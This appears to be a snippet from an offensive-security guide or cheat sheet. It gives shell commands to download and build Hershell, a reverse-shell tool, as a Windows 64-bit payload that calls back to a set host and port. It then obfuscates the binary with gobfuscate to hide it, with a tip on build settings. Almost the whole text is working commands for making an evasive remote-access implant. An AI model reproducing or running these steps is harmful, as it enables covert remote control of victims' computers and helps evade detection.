go get github.com/lesnuages/hershell
cd $GOPATH/src/github.com/lesnuages/hershell/
make depends
make windows64 LHOST=192.168.0.12 LPORT=1234
Obfuscating Hershell
obfuscate Go binaries and packages.
go get github.com/unixpickle/gobfuscate
gobfuscate -outdir github.com/lesnuages/hershell ./out
You will have to set the GOOS and GOARCH before running gobfuscate since it's using the default build profile otherwise it will takes only the Linux source files.